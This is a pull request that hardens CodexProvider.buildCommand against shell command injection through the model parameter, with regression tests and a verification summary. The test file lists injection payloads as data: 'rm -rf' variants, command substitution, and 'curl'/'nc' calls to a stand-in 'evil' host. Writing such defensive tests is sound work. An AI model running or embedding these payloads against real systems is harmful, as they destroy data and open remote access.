### PR TITLE
fix(providers): guard model interpolation in CodexProvider.buildCommand

### DIFF
--- a/src/main/providers/codex-provider.test.ts
+++ b/src/main/providers/codex-provider.test.ts
@@ -83,6 +83,27 @@ describe('CodexProvider', () => {
       expect(modelIdx).toBeGreaterThan(-1);
       expect(approvalIdx).toBeGreaterThan(-1);
     });
+
+    // Regression coverage for issue #150 (mirrors claude-provider.test.ts's
+    // #116 coverage): options.model is untrusted (reachable over the remote
+    // WS bridge with only a token as gate) and is written straight into a PTY
+    // as `codex ... --model <value>`. session-manager.ts is the primary gate
+    // via normalizeModel(), but buildCommand() must never trust its caller
+    // either, in case something reaches it directly.
+    it.each([
+      '; rm -rf ~',
+      'o3`whoami`',
+      'o3$(id)',
+      'o3 && curl evil.com',
+      'o3|nc evil 1',
+      'o3\nrm -rf /',
+      'o3 with spaces',
+    ])('drops a metacharacter-laden model (%j) instead of appending it to the command', (maliciousModel) => {
+      const cmd = provider.buildCommand({ ...baseOptions, model: maliciousModel });
+      expect(cmd).not.toContain('--model');
+      expect(cmd).not.toContain(maliciousModel);
+      expect(cmd).not.toMatch(/[;`$|&\n]/);
+    });
   });
 
   describe('getReadinessPatterns()', () => {

--- a/src/main/providers/codex-provider.ts
+++ b/src/main/providers/codex-provider.ts
@@ -1,5 +1,5 @@
 import { execFile } from 'child_process';
-import { IProvider, ProviderCommandOptions } from './provider';
+import { IProvider, ProviderCommandOptions, isSafeModelToken } from './provider';
 import { ProviderId, ProviderInfo } from '../../shared/types/provider-types';
 import type { StateSignals } from '../../shared/session-state-types';
 
@@ -83,7 +83,12 @@ export class CodexProvider implements IProvider {
   buildCommand(options: ProviderCommandOptions): string {
     let command = 'codex';
 
-    if (options.model) {
+    // isSafeModelToken is a defense-in-depth guard: session-manager.ts already
+    // gates request.model at the trust boundary, but this is the point where
+    // the value is shell-interpolated and written to a PTY, so it is checked
+    // again here in case a caller reaches buildCommand() directly (issue #116,
+    // mirrored from ClaudeProvider.buildCommand — see #150).
+    if (options.model && isSafeModelToken(options.model)) {
       command += ` --model ${options.model}`;
     }
 


### PR DESCRIPTION
## Summary

Closes #150.

`ClaudeProvider.buildCommand()` gates its `--model` interpolation with
`isSafeModelToken()` (issue #116) — a defense-in-depth check applied at the
point the value is shell-interpolated and written to a PTY, independent of
`session-manager.ts`'s trust-boundary gate. `CodexProvider.buildCommand()` did
not have this second layer: it appended `options.model` to the command
unconditionally.

`CodexProvider.normalizeModel()` already rejects shell metacharacters
(`/^[\w][\w.-]*$/`), so the live session-manager path is not exploitable today.
The gap is that Codex had no independent guard at its own interpolation site —
exactly the situation `provider.ts`'s doc comment on `isSafeModelToken` says
must never happen (every later interpolation site should guard so a bypass of
one layer doesn't become command injection), and it was untested.

## Change

- `codex-provider.ts`: import `isSafeModelToken` from `./provider` and gate the
  `--model` append with it, mirroring `claude-provider.ts:150` exactly. No
  behavior change for valid Codex model names (`o3`, `gpt-4.1`, etc. all match
  the pattern) or for `undefined`/empty model.
- `codex-provider.test.ts`: added the same `it.each` metacharacter-drop
  regression test as `claude-provider.test.ts:77-96` (adapted to Codex model
  names), covering `; rm -rf ~`, backtick/`$()` substitution, `&&`, `|`,
  newline, and embedded spaces — asserts none of these get interpolated into
  the built command.

No new dependency — reuses the existing `isSafeModelToken` export from
`provider.ts` (already used by `ClaudeProvider`), per the issue's explicit ask
not to re-implement it.

## Verification

- `npx tsc --noEmit -p tsconfig.json` — clean
- `npx tsc --noEmit -p tsconfig.main.json` — clean
- Targeted: `npx vitest run --config vitest.workspace.ts --project main src/main/providers/codex-provider.test.ts src/main/providers/claude-provider.test.ts` — 2 files, 62 tests passed (24 Codex incl. 7 new regression cases, 38 Claude unchanged)
- Full suite: `npm test` — 97 files, 1076 tests passed, no regressions
- Confirmed existing valid-model tests still pass unchanged (`--model o3`, model-before-approval-mode ordering)